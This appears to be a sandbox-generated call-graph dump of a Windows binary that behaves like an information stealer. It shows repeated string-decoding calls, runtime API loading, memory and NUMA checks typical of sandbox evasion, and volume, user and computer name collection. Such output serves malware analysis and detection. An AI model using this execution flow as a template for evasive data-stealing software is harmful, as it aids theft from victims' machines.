13070 4024b3 13069->13070 13071 4045c0 34 API calls 13070->13071 13072 4024cc 13071->13072 13073 4045c0 34 API calls 13072->13073 13074 4024e5 13073->13074 13075 4045c0 34 API calls 13074->13075 13076 4024fe 13075->13076 13077 4045c0 34 API calls 13076->13077 13078 402517 13077->13078 13079 4045c0 34 API calls 13078->13079 13080 402530 13079->13080 13081 4045c0 34 API calls 13080->13081 13082 402549 13081->13082 13083 4045c0 34 API calls 13082->13083 13084 402562 13083->13084 13085 4045c0 34 API calls 13084->13085 13086 40257b 13085->13086 13087 4045c0 34 API calls 13086->13087 13088 402594 13087->13088 13089 4045c0 34 API calls 13088->13089 13090 4025ad 13089->13090 13091 4045c0 34 API calls 13090->13091 13092 4025c6 13091->13092 13093 4045c0 34 API calls 13092->13093 13094 4025df 13093->13094 13095 4045c0 34 API calls 13094->13095 13096 4025f8 13095->13096 13097 4045c0 34 API calls 13096->13097 13098 402611 13097->13098 13099 4045c0 34 API calls 13098->13099 13100 40262a 13099->13100 13101 4045c0 34 API calls 13100->13101 13102 402643 13101->13102 13103 4045c0 34 API calls 13102->13103 13104 40265c 13103->13104 13105 4045c0 34 API calls 13104->13105 13106 402675 13105->13106 13107 4045c0 34 API calls 13106->13107 13108 40268e 13107->13108 13109 419860 13108->13109 13210 419750 GetPEB 13109->13210 13111 419a93 LoadLibraryA LoadLibraryA 13112 419ac3 LoadLibraryA 13111->13112 13113 419ae6 13112->13113 13113->13008 13114 419868 13114->13111 13116 40117c 13115->13116 13117 401110 13116->13117 13118 401131 VirtualAllocExNuma 13117->13118 13119 401141 13118->13119 13211 4010a0 VirtualAlloc 13119->13211 13121 40114e 13122 401220 13121->13122 13213 4189b0 13122->13213 13125 401249 __aulldiv 13125->13014 13127 415b1d 13126->13127 13215 4026a0 13127->13215 13131 415ca3 13852 415510 13131->13852 13133 415cc3 13857 417500 13133->13857 13135 415da7 13861 404880 13135->13861 13137 415dbe 13867 4117a0 13137->13867 13139 415dc6 13875 405960 13139->13875 13141 415e03 13883 411050 13141->13883 13143 415e0e 13144 405960 6 API calls 13143->13144 13145 415e4c 13144->13145 13889 410d90 13145->13889 13147 415e57 13148 405960 6 API calls 13147->13148 13149 415e93 13148->13149 13895 410f40 13149->13895 13151 415e9e 13901 411a10 13151->13901 13153 415eba 13911 404fb0 13153->13911 13155 415edb 13915 410740 13155->13915 13157 415f60 13158 405960 6 API calls 13157->13158 13159 415fa0 13158->13159 13928 411170 13159->13928 13161 415fab 13934 401e80 13161->13934 13163 415ff0 13164 416000 13163->13164 13165 416092 13163->13165 13167 405960 6 API calls 13164->13167 13166 405960 6 API calls 13165->13166 13168 4160bf 13166->13168 13169 41603a 13167->13169 13950 413560 13168->13950 13940 4112d0 13169->13940 13172 416045 13946 413dc0 13172->13946 13173 41608a 13175 41610b 13173->13175 13957 4140b0 memset 13173->13957 13178 416130 13175->13178 13977 414780 13175->13977 13181 416155 13178->13181 13981 414bb0 13178->13981 13179 4160ec 13971 415100 13179->13971 13182 41617a 13181->13182 13995 414d70 memset 13181->13995 13186 41619f 13182->13186 14006 414f40 13182->14006 13184 416210 13193 4162b3 13184->13193 13194 416220 13184->13194 13189 4161c4 13186->13189 14012 407710 13186->14012 13191 4161e9 13189->13191 14064 415050 13189->14064 13191->13184 14068 419010 13191->14068 13195 405960 6 API calls 13193->13195 13196 405960 6 API calls 13194->13196 13197 4162e0 13195->13197 13198 41625b 13196->13198 13200 413560 6 API calls 13197->13200 13199 4112d0 2 API calls 13198->13199 13201 416266 13199->13201 13202 4162ab 13200->13202 13203 413dc0 9 API calls 13201->13203 13204 405960 6 API calls 13202->13204 13203->13202 13205 41631c 13204->13205 13205->13021 13207 404697 13206->13207 13208 4046ac 11 API calls 13207->13208 13209 40474f 6 API calls 13207->13209 13208->13207 13209->13024 13210->13114 13212 4010c2 codecvt 13211->13212 13212->13121 13214 401233 GlobalMemoryStatusEx 13213->13214 13214->13125 13216 4045c0 34 API calls 13215->13216 13217 4026b4 13216->13217 13218 4045c0 34 API calls 13217->13218 13219 4026d7 13218->13219 13220 4045c0 34 API calls 13219->13220 13221 4026f0 13220->13221 13222 4045c0 34 API calls 13221->13222 13223 402709 13222->13223 13224 4045c0 34 API calls 13223->13224 13225 402736 13224->13225 13226 4045c0 34 API calls 13225->13226 13227 40274f 13226->13227 13228 4045c0 34 API calls 13227->13228 13229 402768 13228->13229 13230 4045c0 34 API calls 13229->13230 13231 402795 13230->13231 13232 4045c0 34 API calls 13231->13232 13233 4027ae 13232->13233 13234 4045c0 34 API calls 13233->13234 13235 4027c7 13234->13235 13236 4045c0 34 API calls 13235->13236 13237 4027e0 13236->13237 13238 4045c0 34 API calls 13237->13238 13239 4027f9 13238->13239 13240 4045c0 34 API calls 13239->13240 13241 402812 13240->13241 13242 4045c0 34 API calls 13241->13242 13243 40282b 13242->13243 13244 4045c0 34 API calls 13243->13244 13245 402844 13244->13245 13246 4045c0 34 API calls 13245->13246 13247 40285d 13246->13247 13248 4045c0 34 API calls 13247->13248 13249 402876 13248->13249 13250 4045c0 34 API calls 13249->13250 13251 40288f 13250->13251 13252 4045c0 34 API calls 13251->13252 13253 4028a8 13252->13253 13254 4045c0 34 API calls 13253->13254 13255 4028c1 13254->13255 13256 4045c0 34 API calls 13255->13256 13257 4028da 13256->13257 13258 4045c0 34 API calls 13257->13258 13259 4028f3 13258->13259 13260 4045c0 34 API calls 13259->13260 13261 40290c 13260->13261 13262 4045c0 34 API calls 13261->13262 13263 402925 13262->13263 13264 4045c0 34 API calls 13263->13264 13265 40293e 13264->13265 13266 4045c0 34 API calls 13265->13266 13267 402957 13266->13267 13268 4045c0 34 API calls 13267->13268 13269 402970 13268->13269 13270 4045c0 34 API calls 13269->13270 13271 402989 13270->13271 13272 4045c0 34 API calls 13271->13272 13273 4029a2 13272->13273 13274 4045c0 34 API calls 13273->13274 13275 4029bb 13274->13275 13276 4045c0 34 API calls 13275->13276 13277 4029d4 13276->13277 13278 4045c0 34 API calls 13277->13278 13279 4029ed 13278->13279 13280 4045c0 34 API calls 13279->13280 13281 402a06 13280->13281 13282 4045c0 34 API calls 13281->13282 13283 402a1f 13282->13283 13284 4045c0 34 API calls 13283->13284 13285 402a38 13284->13285 13286 4045c0 34 API calls 13285->13286 13287 402a51 13286->13287 13288 4045c0 34 API calls 13287->13288 13289 402a6a 13288->13289 13290 4045c0 34 API calls 13289->13290 13291 402a83 13290->13291 13292 4045c0 34 API calls 13291->13292 13293 402a9c 13292->13293 13294 4045c0 34 API calls 13293->13294 13295 402ab5 13294->13295 13296 4045c0 34 API calls 13295->13296 13297 402ace 13296->13297 13298 4045c0 34 API calls 13297->13298 13299 402ae7 13298->13299 13300 4045c0 34 API calls 13299->13300 13301 402b00 13300->13301 13302 4045c0 34 API calls 13301->13302 13303 402b19 13302->13303 13304 4045c0 34 API calls 13303->13304 13305 402b32 13304->13305 13306 4045c0 34 API calls 13305->13306 13307 402b4b 13306->13307 13308 4045c0 34 API calls 13307->13308 13309 402b64 13308->13309 13310 4045c0 34 API calls 13309->13310 13311 402b7d 13310->13311 13312 4045c0 34 API calls 13311->13312 13313 402b96 13312->13313 13314 4045c0 34 API calls 13313->13314 13315 402baf 13314->13315 13316 4045c0 34 API calls 13315->13316 13317 402bc8 13316->13317 13318 4045c0 34 API calls 13317->13318 13319 402be1 13318->13319 13320 4045c0 34 API calls 13319->13320 13321 402bfa 13320->13321 13322 4045c0 34 API calls 13321->13322 13323 402c13 13322->13323 13324 4045c0 34 API calls 13323->13324 13325 402c2c 13324->13325 13326 4045c0 34 API calls 13325->13326 13327 402c45 13326->13327 13328 4045c0 34 API calls 13327->13328 13329 402c5e 13328->13329 13330 4045c0 34 API calls 13329->13330 13331 402c77 13330->13331 13332 4045c0 34 API calls 13331->13332 13333 402c90 13332->13333 13334 4045c0 34 API calls 13333->13334 13335 402ca9 13334->13335 13336 4045c0 34 API calls 13335->13336 13337 402cc2 13336->13337 13338 4045c0 34 API calls 13337->13338 13339 402cdb 13338->13339 13340 4045c0 34 API calls 13339->13340 13341 402cf4 13340->13341 13342 4045c0 34 API calls 13341->13342 13343 402d0d 13342->13343 13344 4045c0 34 API calls 13343->13344 13345 402d26 13344->13345 13346 4045c0 34 API calls 13345->13346 13347 402d3f 13346->13347 13348 4045c0 34 API calls 13347->13348 13349 402d58 13348->13349 13350 4045c0 34 API calls 13349->13350 13351 402d71 13350->13351 13352 4045c0 34 API calls 13351->13352 13353 402d8a 13352->13353 13354 4045c0 34 API calls 13353->13354 13355 402da3 13354->13355 13356 4045c0 34 API calls 13355->13356 13357 402dbc 13356->13357 13358 4045c0 34 API calls 13357->13358 13359 402dd5 13358->13359 13360 4045c0 34 API calls 13359->13360 13361 402dee 13360->13361 13362 4045c0 34 API calls 13361->13362 13363 402e07 13362->13363 13364 4045c0 34 API calls 13363->13364 13365 402e20 13364->13365 13366 4045c0 34 API calls 13365->13366 13367 402e39 13366->13367 13368 4045c0 34 API calls 13367->13368 13369 402e52 13368->13369 13370 4045c0 34 API calls 13369->13370 13371 402e6b 13370->13371 13372 4045c0 34 API calls 13371->13372 13373 402e84 13372->13373 13374 4045c0 34 API calls 13373->13374 13375 402e9d 13374->13375 13376 4045c0 34 API calls 13375->13376 13377 402eb6 13376->13377 13378 4045c0 34 API calls 13377->13378 13379 402ecf 13378->13379 13380 4045c0 34 API calls 13379->13380 13381 402ee8 13380->13381 13382 4045c0 34 API calls 13381->13382 13383 402f01 13382->13383 13384 4045c0 34 API calls 13383->13384 13385 402f1a 13384->13385 13386 4045c0 34 API calls 13385->13386 13387 402f33 13386->13387 13388 4045c0 34 API calls 13387->13388 13389 402f4c 13388->13389 13390 4045c0 34 API calls 13389->13390 13391 402f65 13390->13391 13392 4045c0 34 API calls 13391->13392 13393 402f7e 13392->13393 13394 4045c0 34 API calls 13393->13394 13395 402f97 13394->13395 13396 4045c0 34 API calls 13395->13396 13397 402fb0 13396->13397 13398 4045c0 34 API calls 13397->13398 13399 402fc9 13398->13399 13400 4045c0 34 API calls 13399->13400 13401 402fe2 13400->13401 13402 4045c0 34 API calls 13401->13402 13403 402ffb 13402->13403 13404 4045c0 34 API calls 13403->13404 13405 403014 13404->13405 13406 4045c0 34 API calls 13405->13406 13407 40302d 13406->13407 13408 4045c0 34 API calls 13407->13408 13409 403046 13408->13409 13410 4045c0 34 API calls 13409->13410 13411 40305f 13410->13411 13412 4045c0 34 API calls 13411->13412 13413 403078 13412->13413 13414 4045c0 34 API calls 13413->13414 13415 403091 13414->13415 13416 4045c0 34 API calls 13415->13416 13417 4030aa 13416->13417 13418 4045c0 34 API calls 13417->13418 13419 4030c3 13418->13419 13420 4045c0 34 API calls 13419->13420 13421 4030dc 13420->13421 13422 4045c0 34 API calls 13421->13422 13423 4030f5 13422->13423 13424 4045c0 34 API calls 13423->13424 13425 40310e 13424->13425 13426 4045c0 34 API calls 13425->13426 13427 403127 13426->13427 13428 4045c0 34 API calls 13427->13428 13429 403140 13428->13429 13430 4045c0 34 API calls 13429->13430 13431 403159 13430->13431 13432 4045c0 34 API calls 13431->13432 13433 403172 13432->13433 13434 4045c0 34 API calls 13433->13434 13435 40318b 13434->13435 13436 4045c0 34 API calls 13435->13436 13437 4031a4 13436->13437 13438 4045c0 34 API calls 13437->13438 13439 4031bd 13438->13439 13440 4045c0 34 API calls 13439->13440 13441 4031d6 13440->13441 13442 4045c0 34 API calls 13441->13442 13443 4031ef 13442->13443 13444 4045c0 34 API calls 13443->13444 13445 403208 13444->13445 13446 4045c0 34 API calls 13445->13446 13447 403221 13446->13447 13448 4045c0 34 API calls 13447->13448 13449 40323a 13448->13449 13450 4045c0 34 API calls 13449->13450 13451 403253 13450->13451 13452 4045c0 34 API calls 13451->13452 13453 40326c 13452->13453 13454 4045c0 34 API calls 13453->13454 13455 403285 13454->13455 13456 4045c0 34 API calls 13455->13456 13457 40329e 13456->13457 13458 4045c0 34 API calls 13457->13458 13459 4032b7 13458->13459 13460 4045c0 34 API calls 13459->13460 13461 4032d0 13460->13461 13462 4045c0 34 API calls 13461->13462 13463 4032e9 13462->13463 13464 4045c0 34 API calls 13463->13464 13465 403302 13464->13465 13466 4045c0 34 API calls 13465->13466 13467 40331b 13466->13467 13468 4045c0 34 API calls 13467->13468 13469 403334 13468->13469 13470 4045c0 34 API calls 13469->13470 13471 40334d 13470->13471 13472 4045c0 34 API calls 13471->13472 13473 403366 13472->13473 13474 4045c0 34 API calls 13473->13474 13475 40337f 13474->13475 13476 4045c0 34 API calls 13475->13476 13477 403398 13476->13477 13478 4045c0 34 API calls 13477->13478 13479 4033b1 13478->13479 13480 4045c0 34 API calls 13479->13480 13481 4033ca 13480->13481 13482 4045c0 34 API calls 13481->13482 13483 4033e3 13482->13483 13484 4045c0 34 API calls 13483->13484 13485 4033fc 13484->13485 13486 4045c0 34 API calls 13485->13486 13487 403415 13486->13487 13488 4045c0 34 API calls 13487->13488 13489 40342e 13488->13489 13490 4045c0 34 API calls 13489->13490 13491 403447 13490->13491 13492 4045c0 34 API calls 13491->13492 13493 403460 13492->13493 13494 4045c0 34 API calls 13493->13494 13495 403479 13494->13495 13496 4045c0 34 API calls 13495->13496 13497 403492 13496->13497 13498 4045c0 34 API calls 13497->13498 13499 4034ab 13498->13499 13500 4045c0 34 API calls 13499->13500 13501 4034c4 13500->13501 13502 4045c0 34 API calls 13501->13502 13503 4034dd 13502->13503 13504 4045c0 34 API calls 13503->13504 13505 4034f6 13504->13505 13506 4045c0 34 API calls 13505->13506 13507 40350f 13506->13507 13508 4045c0 34 API calls 13507->13508 13509 403528 13508->13509 13510 4045c0 34 API calls 13509->13510 13511 403541 13510->13511 13512 4045c0 34 API calls 13511->13512 13513 40355a 13512->13513 13514 4045c0 34 API calls 13513->13514 13515 403573 13514->13515 13516 4045c0 34 API calls 13515->13516 13517 40358c 13516->13517 13518 4045c0 34 API calls 13517->13518 13519 4035a5 13518->13519 13520 4045c0 34 API calls 13519->13520 13521 4035be 13520->13521 13522 4045c0 34 API calls 13521->13522 13523 4035d7 13522->13523 13524 4045c0 34 API calls 13523->13524 13525 4035f0 13524->13525 13526 4045c0 34 API calls 13525->13526 13527 403609 13526->13527 13528 4045c0 34 API calls 13527->13528 13529 403622 13528->13529 13530 4045c0 34 API calls 13529->13530 13531 40363b 13530->13531 13532 4045c0 34 API calls 13531->13532 13533 403654 13532->13533 13534 4045c0 34 API calls 13533->13534 13535 40366d 13534->13535 13536 4045c0 34 API calls 13535->13536 13537 403686 13536->13537 13538 4045c0 34 API calls 13537->13538 13539 40369f 13538->13539 13540 4045c0 34 API calls 13539->13540 13541 4036b8 13540->13541 13542 4045c0 34 API calls 13541->13542 13543 4036d1 13542->13543 13544 4045c0 34 API calls 13543->13544 13545 4036ea 13544->13545 13546 4045c0 34 API calls 13545->13546 13547 403703 13546->13547 13548 4045c0 34 API calls 13547->13548 13549 40371c 13548->13549 13550 4045c0 34 API calls 13549->13550 13551 403735 13550->13551 13552 4045c0 34 API calls 13551->13552 13553 40374e 13552->13553 13554 4045c0 34 API calls 13553->13554 13555 403767 13554->13555 13556 4045c0 34 API calls 13555->13556 13557 403780 13556->13557 13558 4045c0 34 API calls 13557->13558 13559 403799 13558->13559 13560 4045c0 34 API calls 13559->13560 13561 4037b2 13560->13561 13562 4045c0 34 API calls 13561->13562 13563 4037cb 13562->13563 13564 4045c0 34 API calls 13563->13564 13565 4037e4 13564->13565 13566 4045c0 34 API calls 13565->13566 13567 4037fd 13566->13567 13568 4045c0 34 API calls 13567->13568 13569 403816 13568->13569 13570 4045c0 34 API calls 13569->13570 13571 40382f 13570->13571 13572 4045c0 34 API calls 13571->13572 13573 403848 13572->13573 13574 4045c0 34 API calls 13573->13574 13575 403861 13574->13575 13576 4045c0 34 API calls 13575->13576 13577 40387a 13576->13577 13578 4045c0 34 API calls 13577->13578 13579 403893 13578->13579 13580 4045c0 34 API calls 13579->13580 13581 4038ac 13580->13581 13582 4045c0 34 API calls 13581->13582 13583 4038c5 13582->13583 13584 4045c0 34 API calls 13583->13584 13585 4038de 13584->13585 13586 4045c0 34 API calls 13585->13586 13587 4038f7 13586->13587 13588 4045c0 34 API calls 13587->13588 13589 403910 13588->13589 13590 4045c0 34 API calls 13589->13590 13591 403929 13590->13591 13592 4045c0 34 API calls 13591->13592 13593 403942 13592->13593 13594 4045c0 34 API calls 13593->13594 13595 40395b 13594->13595 13596 4045c0 34 API calls 13595->13596 13597 403974 13596->13597 13598 4045c0 34 API calls 13597->13598 13599 40398d 13598->13599 13600 4045c0 34 API calls 13599->13600 13601 4039a6 13600->13601 13602 4045c0 34 API calls 13601->13602 13603 4039bf 13602->13603 13604 4045c0 34 API calls 13603->13604 13605 4039d8 13604->13605 13606 4045c0 34 API calls 13605->13606 13607 4039f1 13606->13607 13608 4045c0 34 API calls 13607->13608 13609 403a0a 13608->13609 13610 4045c0 34 API calls 13609->13610 13611 403a23 13610->13611 13612 4045c0 34 API calls 13611->13612 13613 403a3c 13612->13613 13614 4045c0 34 API calls 13613->13614 13615 403a55 13614->13615 13616 4045c0 34 API calls 13615->13616 13617 403a6e 13616->13617 13618 4045c0 34 API calls 13617->13618 13619 403a87 13618->13619 13620 4045c0 34 API calls 13619->13620 13621 403aa0 13620->13621 13622 4045c0 34 API calls 13621->13622 13623 403ab9 13622->13623 13624 4045c0 34 API calls 13623->13624 13625 403ad2 13624->13625 13626 4045c0 34 API calls 13625->13626 13627 403aeb 13626->13627 13628 4045c0 34 API calls 13627->13628 13629 403b04 13628->13629 13630 4045c0 34 API calls 13629->13630 13631 403b1d 13630->13631 13632 4045c0 34 API calls 13631->13632 13633 403b36 13632->13633 13634 4045c0 34 API calls 13633->13634 13635 403b4f 13634->13635 13636 4045c0 34 API calls 13635->13636 13637 403b68 13636->13637 13638 4045c0 34 API calls 13637->13638 13639 403b81 13638->13639 13640 4045c0 34 API calls 13639->13640 13641 403b9a 13640->13641 13642 4045c0 34 API calls 13641->13642 13643 403bb3 13642->13643 13644 4045c0 34 API calls 13643->13644 13645 403bcc 13644->13645 13646 4045c0 34 API calls 13645->13646 13647 403be5 13646->13647 13648 4045c0 34 API calls 13647->13648 13649 403bfe 13648->13649 13650 4045c0 34 API calls 13649->13650 13651 403c17 13650->13651 13652 4045c0 34 API calls 13651->13652 13653 403c30 13652->13653 13654 4045c0 34 API calls 13653->13654 13655 403c49 13654->13655 13656 4045c0 34 API calls 13655->13656 13657 403c62 13656->13657 13658 4045c0 34 API calls 13657->13658 13659 403c7b 13658->13659 13660 4045c0 34 API calls 13659->13660 13661 403c94 13660->13661 13662 4045c0 34 API calls 13661->13662 13663 403cad 13662->13663 13664 4045c0 34 API calls 13663->13664 13665 403cc6 13664->13665 13666 4045c0 34 API calls 13665->13666 13667 403cdf 13666->13667 13668 4045c0 34 API calls 13667->13668 13669 403cf8 13668->13669 13670 4045c0 34 API calls 13669->13670 13671 403d11 13670->13671 13672 4045c0 34 API calls 13671->13672 13673 403d2a 13672->13673 13674 4045c0 34 API calls 13673->13674 13675 403d43 13674->13675 13676 4045c0 34 API calls 13675->13676 13677 403d5c 13676->13677 13678 4045c0 34 API calls 13677->13678 13679 403d75 13678->13679 13680 4045c0 34 API calls 13679->13680 13681 403d8e 13680->13681 13682 4045c0 34 API calls 13681->13682 13683 403da7 13682->13683 13684 4045c0 34 API calls 13683->13684 13685 403dc0 13684->13685 13686 4045c0 34 API calls 13685->13686 13687 403dd9 13686->13687 13688 4045c0 34 API calls 13687->13688 13689 403df2 13688->13689 13690 4045c0 34 API calls 13689->13690 13691 403e0b 13690->13691 13692 4045c0 34 API calls 13691->13692 13693 403e24 13692->13693 13694 4045c0 34 API calls 13693->13694 13695 403e3d 13694->13695 13696 4045c0 34 API calls 13695->13696 13697 403e56 13696->13697 13698 4045c0 34 API calls 13697->13698 13699 403e6f 13698->13699 13700 4045c0 34 API calls 13699->13700 13701 403e88 13700->13701 13702 4045c0 34 API calls 13701->13702 13703 403ea1 13702->13703 13704 4045c0 34 API calls 13703->13704 13705 403eba 13704->13705 13706 4045c0 34 API calls 13705->13706 13707 403ed3 13706->13707 13708 4045c0 34 API calls 13707->13708 13709 403eec 13708->13709 13710 4045c0 34 API calls 13709->13710 13711 403f05 13710->13711 13712 4045c0 34 API calls 13711->13712 13713 403f1e 13712->13713 13714 4045c0 34 API calls 13713->13714 13715 403f37 13714->13715 13716 4045c0 34 API calls 13715->13716 13717 403f50 13716->13717 13718 4045c0 34 API calls 13717->13718 13719 403f69 13718->13719 13720 4045c0 34 API calls 13719->13720 13721 403f82 13720->13721 13722 4045c0 34 API calls 13721->13722 13723 403f9b 13722->13723 13724 4045c0 34 API calls 13723->13724 13725 403fb4 13724->13725 13726 4045c0 34 API calls 13725->13726 13727 403fcd 13726->13727 13728 4045c0 34 API calls 13727->13728 13729 403fe6 13728->13729 13730 4045c0 34 API calls 13729->13730 13731 403fff 13730->13731 13732 4045c0 34 API calls 13731->13732 13733 404018 13732->13733 13734 4045c0 34 API calls 13733->13734 13735 404031 13734->13735 13736 4045c0 34 API calls 13735->13736 13737 40404a 13736->13737 13738 4045c0 34 API calls 13737->13738 13739 404063 13738->13739 13740 4045c0 34 API calls 13739->13740 13741 40407c 13740->13741 13742 4045c0 34 API calls 13741->13742 13743 404095 13742->13743 13744 4045c0 34 API calls 13743->13744 13745 4040ae 13744->13745 13746 4045c0 34 API calls 13745->13746 13747 4040c7 13746->13747 13748 4045c0 34 API calls 13747->13748 13749 4040e0 13748->13749 13750 4045c0 34 API calls 13749->13750 13751 4040f9 13750->13751 13752 4045c0 34 API calls 13751->13752 13753 404112 13752->13753 13754 4045c0 34 API calls 13753->13754 13755 40412b 13754->13755 13756 4045c0 34 API calls 13755->13756 13757 404144 13756->13757 13758 4045c0 34 API calls 13757->13758 13759 40415d 13758->13759 13760 4045c0 34 API calls 13759->13760 13761 404176 13760->13761 13762 4045c0 34 API calls 13761->13762 13763 40418f 13762->13763 13764 4045c0 34 API calls 13763->13764 13765 4041a8 13764->13765 13766 4045c0 34 API calls 13765->13766 13767 4041c1 13766->13767 13768 4045c0 34 API calls 13767->13768 13769 4041da 13768->13769 13770 4045c0 34 API calls 13769->13770 13771 4041f3 13770->13771 13772 4045c0 34 API calls 13771->13772 13773 40420c 13772->13773 13774 4045c0 34 API calls 13773->13774 13775 404225 13774->13775 13776 4045c0 34 API calls 13775->13776 13777 40423e 13776->13777 13778 4045c0 34 API calls 13777->13778 13779 404257 13778->13779 13780 4045c0 34 API calls 13779->13780 13781 404270 13780->13781 13782 4045c0 34 API calls 13781->13782 13783 404289 13782->13783 13784 4045c0 34 API calls 13783->13784 13785 4042a2 13784->13785 13786 4045c0 34 API calls 13785->13786 13787 4042bb 13786->13787 13788 4045c0 34 API calls 13787->13788 13789 4042d4 13788->13789 13790 4045c0 34 API calls 13789->13790 13791 4042ed 13790->13791 13792 4045c0 34 API calls 13791->13792 13793 404306 13792->13793 13794 4045c0 34 API calls 13793->13794 13795 40431f 13794->13795 13796 4045c0 34 API calls 13795->13796 13797 404338 13796->13797 13798 4045c0 34 API calls 13797->13798 13799 404351 13798->13799 13800 4045c0 34 API calls 13799->13800 13801 40436a 13800->13801 13802 4045c0 34 API calls 13801->13802 13803 404383 13802->13803 13804 4045c0 34 API calls 13803->13804 13805 40439c 13804->13805 13806 4045c0 34 API calls 13805->13806 13807 4043b5 13806->13807 13808 4045c0 34 API calls 13807->13808 13809 4043ce 13808->13809 13810 4045c0 34 API calls 13809->13810 13811 4043e7 13810->13811 13812 4045c0 34 API calls 13811->13812 13813 404400 13812->13813 13814 4045c0 34 API calls 13813->13814 13815 404419 13814->13815 13816 4045c0 34 API calls 13815->13816 13817 404432 13816->13817 13818 4045c0 34 API calls 13817->13818 13819 40444b 13818->13819 13820 4045c0 34 API calls 13819->13820 13821 404464 13820->13821 13822 4045c0 34 API calls 13821->13822 13823 40447d 13822->13823 13824 4045c0 34 API calls 13823->13824 13825 404496 13824->13825 13826 4045c0 34 API calls 13825->13826 13827 4044af 13826->13827 13828 4045c0 34 API calls 13827->13828 13829 4044c8 13828->13829 13830 4045c0 34 API calls 13829->13830 13831 4044e1 13830->13831 13832 4045c0 34 API calls 13831->13832 13833 4044fa 13832->13833 13834 4045c0 34 API calls 13833->13834 13835 404513 13834->13835 13836 4045c0 34 API calls 13835->13836 13837 40452c 13836->13837 13838 4045c0 34 API calls 13837->13838 13839 404545 13838->13839 13840 4045c0 34 API calls 13839->13840 13841 40455e 13840->13841 13842 4045c0 34 API calls 13841->13842 13843 404577 13842->13843 13844 4045c0 34 API calls 13843->13844 13845 404590 13844->13845 13846 4045c0 34 API calls 13845->13846 13847 4045a9 13846->13847 13848 419c10 13847->13848 13849 41a036 8 API calls 13848->13849 13851 419c20 13848->13851 13850 41a0cc 13849->13850 13850->13131 13851->13849 13854 415521 13852->13854 13853 4152c0 10 API calls 13853->13854 13854->13853 13855 4151f0 9 API calls 13854->13855 13856 4157dc 13854->13856 13855->13854 13856->13133 13859 417548 GetVolumeInformationA 13857->13859 13860 417591 13859->13860 13860->13135 13862 404899 13861->13862 14074 4047b0 13862->14074 13864 404ebe codecvt 13864->13137 13865 404ea9 InternetCloseHandle 13865->13864 13866 4048a5 13866->13864 13866->13865 13868 4117c4 13867->13868 13869 4117d7 13868->13869 13870 4117cf ExitProcess 13868->13870 13871 4117e7 strtok_s 13869->13871 13874 4117f4 13871->13874 13872 4119c2 13872->13139 13873 41199e strtok_s 13873->13874 13874->13872 13874->13873 13876 405979 13875->13876 13877 4047b0 4 API calls 13876->13877 13879 405985 13877->13879 13878 405f1a codecvt 13878->13141 13879->13878 13880 405ebe memcpy 13879->13880 13881 405ed7 13880->13881 13882 405ef7 memcpy 13881->13882 13882->13878 14082 41aad0 13883->14082 13885 411077 strtok_s 13888 411084 13885->13888 13886 411151 13886->13143 13887 41112d strtok_s 13887->13888 13888->13886 13888->13887 14083 41aad0 13889->14083 13891 410db7 strtok_s 13894 410dc4 13891->13894 13892 410f17 13892->13147 13893 410ef3 strtok_s 13893->13894 13894->13892 13894->13893 14084 41aad0 13895->14084 13897 410f67 strtok_s 13900 410f74 13897->13900 13898 411044 13898->13151 13899 411020 strtok_s 13899->13900 13900->13898 13900->13899 13902 411a26 13901->13902 13903 417500 GetVolumeInformationA 13902->13903 13904 411b96 13903->13904 13905 417850 GetUserNameA 13904->13905 13906 411d14 13905->13906 13907 4178e0 GetComputerNameA 13906->13907 13908 411d8e 13907->13908 14085 415190 13908->14085 13910 412699 13910->13153 13914 404fd0 13911->13914 13912 405070 memcpy 13912->13914 13913 4050a0 13913->13155 13914->13912 13914->13913 14099 4098d0 13915->14099 13917 410759 13918 410a38 13917->13918 13921 41077d 13917->13921 14126 410250 13918->14126 13920 410a4e 13920->13157 13926 410843 13921->13926 14102 40fb00 13921->14102 13923 410a2d 13923->13157 13924 41096b 13924->13923 14118 410030 13924->14118 13926->13924 14110 40fd60 13926->14110 14307 41aad0 13928->14307 13930 411197 strtok_s 13933 4111a4 13930->13933 13931 4112b0 13931->13161 13932 41128c strtok_s 13932->13933 13933->13931 13933->13932 13938 401e8f 13934->13938 13935 401f37 14312 401310 memset 13935->14312 13937 401f4d 13937->13163 13938->13935 14308 4016d0 13938->14308 14318 41aad0 13940->14318 13942 411306 strtok_s 13945 41133b codecvt 13942->13945 13943 411773 13943->13172 13944 411740 strtok_s 13944->13945 13945->13943 13945->13944 13948 413dcf 13946->13948 13947 413e18 13947->13173 13948->13947 14319 413c90 13948->14319 14332 41aad0 13950->14332 13952 413587 strtok_s 13956 4135a1 13952->13956 13953 4136eb 13953->13173 13954 4136c7 strtok_s 13954->13956 13956->13953 13956->13954 14333 412e30 13956->14333 13958 4140fa codecvt 13957->13958 14342 413ea0 13958->14342 13960 414185 13961 413ea0 7 API calls 13960->13961 13962 4141af 13961->13962 13963 413ea0 7 API calls 13962->13963 13964 4141d9 13963->13964 13965 413ea0 7 API calls 13964->13965 13966 414203 13965->13966 13967 413ea0 7 API calls 13966->13967 13968 41422d 13967->13968 13969 413ea0 7 API calls 13968->13969 13970 414257 codecvt 13969->13970 13970->13179 13972 415113 13971->13972 14346 4172f0 13972->14346 13974 415118 13975 415190 7 API calls 13974->13975 13976 415163 13975->13976 13976->13175 13978 41479a codecvt 13977->13978 13980 4148af codecvt 13978->13980 14509 414570 13978->14509 13980->13178 13982 414bca codecvt 13981->13982 14521 414910 13982->14521 13984 414c3d 13985 414910 7 API calls 13984->13985 13986 414c72 13985->13986 13987 414910 7 API calls 13986->13987 13988 414ca8 13987->13988 13989 414910 7 API calls 13988->13989 13990 414cdd 13989->13990 13991 414910 7 API calls 13990->13991 13992 414d13 13991->13992 13993 414910 7 API calls 13992->13993 13994 414d48 codecvt 13993->13994 13994->13181 13996 414d9e 13995->13996 13997 414910 7 API calls 13996->13997 13998 414dff memset 13997->13998 13999 414e2a 13998->13999 14000 414910 7 API calls 13999->14000 14001 414e8b memset 14000->14001 14002 414eb6 14001->14002 14003 414910 7 API calls 14002->14003 14004 414f17 memset 14003->14004 14005 414f3c 14004->14005 14005->13182 14007 414f5a codecvt 14006->14007 14008 414910 7 API calls 14007->14008 14009 414ff3 14008->14009 14010 414910 7 API calls 14009->14010 14011 415028 codecvt 14010->14011 14011->13186 14013 40771d codecvt 14012->14013 14526 4075d0 14013->14526 14016 4075d0 13 API calls 14017 407c9f 14016->14017 14018 4075d0 13 API calls 14017->14018 14019 407cae 14018->14019 14020 4075d0 13 API calls 14019->14020 14021 407cbd 14020->14021 14022 4075d0 13 API calls 14021->14022 14023 407ccc 14022->14023 14024 4075d0 13 API calls 14023->14024 14025 407cdb 14024->14025 14026 4075d0 13 API calls 